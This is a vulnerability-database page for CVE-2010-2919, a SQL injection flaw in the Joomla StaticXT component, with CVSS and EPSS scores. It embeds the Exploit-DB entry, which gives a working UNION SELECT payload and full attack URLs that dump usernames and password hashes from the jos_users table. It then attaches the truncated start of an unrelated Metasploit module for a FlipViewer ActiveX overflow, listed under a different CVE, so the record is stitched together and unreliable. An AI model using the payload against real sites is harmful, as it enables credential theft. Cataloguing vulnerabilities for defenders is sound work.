CVE-2010-2919
published 2010-07-30CVE-2010-2919: SQL injection vulnerability in the StaticXT (com_staticxt) component for Joomla! allows remote attackers to execute arbitrary SQL commands via the id parameter…
PriorityP345high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
0.97%
57.4th percentile
SQL injection vulnerability in the StaticXT (com_staticxt) component for Joomla! allows remote attackers to execute arbitrary SQL commands via the id parameter to index.php.
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Joomla! Component StaticXT - SQL Injection
exploitdb·2010-07-17
CVE-2010-2919 Joomla! Component StaticXT - SQL Injection
Joomla! Component StaticXT - SQL Injection
---
Joomla Component (com_staticxt) SQL Injection Vulnerability
Author : Palyo34 & KroNicKq
Homepage : http://www.1923turk.com
[+] Vulnerable File :
http://www.site.com/index.php?option=com_staticxt&staticfile=test.php&id=1923[SQL]
[+] ExploiT :
union+select+concat_ws(0x3a,username,password),2,3,4,5,6,7,8,9,10,11,12+from+jos_users
jos_users--
[+] G00gle Dork : :S
[+] Example :
http://www.site.com/index.php?option=com_staticxt&staticfile=test.php&id=-1923+union select+concat_ws(0x3a,username,password),2,3,4,5,6,7,8,9,10,11,12+from+jos_users
[+] Demo :
http://www.site.com/index.php?option=com_staticxt&staticfile=test1.php&id=-79+union select+concat_ws(0x3a,username,password),2,3,4,5,6,7,8,9,10,11,12+from+jos_users
...:: Onurlu
Exploit-DB
FlipViewer FViewerLoading - ActiveX Control Buffer Overflow (Metasploit)
exploitdb·2010-06-15
CVE-2007-2919 FlipViewer FViewerLoading - ActiveX Control Buffer Overflow (Metasploit)
FlipViewer FViewerLoading - ActiveX Control Buffer Overflow (Metasploit)
---
##
# $Id: ebook_flipviewer_fviewerloading.rb 9525 2010-06-15 07:18:08Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'FlipViewer FViewerLoading ActiveX Control Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in E-BOOK Systems FlipViewer 4.0.
The vulnerability is caused due to a boundary error in the
FViewerLoading (FlipViewerX.dll) ActiveX control when handling the
"LoadOpf()" method.
},
'License' => BSD_LICENSE,
'Author
No writeups or analysis indexed.
http://packetstormsecurity.org/1007-exploits/joomlastaticxt-sql.txthttp://www.exploit-db.com/exploits/14395https://exchange.xforce.ibmcloud.com/vulnerabilities/60462http://packetstormsecurity.org/1007-exploits/joomlastaticxt-sql.txthttp://www.exploit-db.com/exploits/14395https://exchange.xforce.ibmcloud.com/vulnerabilities/60462
2010-07-30
Published